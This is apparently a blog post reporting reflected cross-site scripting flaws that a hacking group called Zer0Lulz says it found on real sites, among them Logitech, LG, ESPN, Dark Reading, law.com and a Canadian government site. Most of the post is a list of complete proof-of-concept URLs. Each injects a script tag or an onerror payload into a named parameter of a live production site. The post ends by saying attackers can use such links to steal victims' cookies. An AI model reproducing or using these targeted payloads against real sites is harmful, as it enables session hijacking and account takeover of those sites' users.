Search This Blog

Reflected XSS Vulnerability found in darkreading, LOGITECH, LG, law.com


The Web-Hacking group Zer0Lulz has discovered Reflected XSS vulnerabilities in lot of high profile sites, including LG,Logitech,Darkreading. Hackers named their operation as "#OP XSSec"

Vulnerable sites and Poc:
http://www.nhl.com/ice/search?q=";alert("XSS");"

http://espn.go.com/espn/page2/index?id="><script>alert("XSS")</script>

http://www.food.com/recipes.php?chef="><script>alert("XSS")</script>

http://www.logitech.com/en-au/footer/terms-of-use/&id="><script>alert("XSS")</script>

http://www.darkreading.com/search/index?queryText="><script>alert("XSS")</script>

http://www.law.com/jsp/nj/PubArticleNJ.jsp?id="><script>alert("XSS")</script>

http://www.theweathernetwork.com/index.php?product=</script><script>alert("XSS")</script>

http://ryanseacrest.com/search/?q="><script>alert(/XSS/)</script>

http://common.at40.com/static/subway_polls/poll_frame.php?poll_id="></script><script>alert("XSS")</script>

http://www.lg.com/ca_en/common/search/controller.jsp?N=8110&Ntk=All&Ntt=<img src="XSS" onerror=alert("XSS");>&Nty=1&D=Lulz&Ntx=mode+matchallpartial&Dx=mode+matchallpartial&srchLocalCode=ca_en&search_businessType=0&sid=1350DDC94D47

http://www.canada.gc.ca/cgi-bin/termium/autonomyTermium.pl?LULZ&"><script>alert("XSS")</script>

Social Engineering Attack:
Using this Reflected XSS vulnerability, an attacker can steal cookies from victim.  As these sites are trusted one, users won't hesitate to click the link(injected with xss). It will results in their account hacked.


Share it:

Vulnerability

Web Application Vulnerability

XSS Vulnerability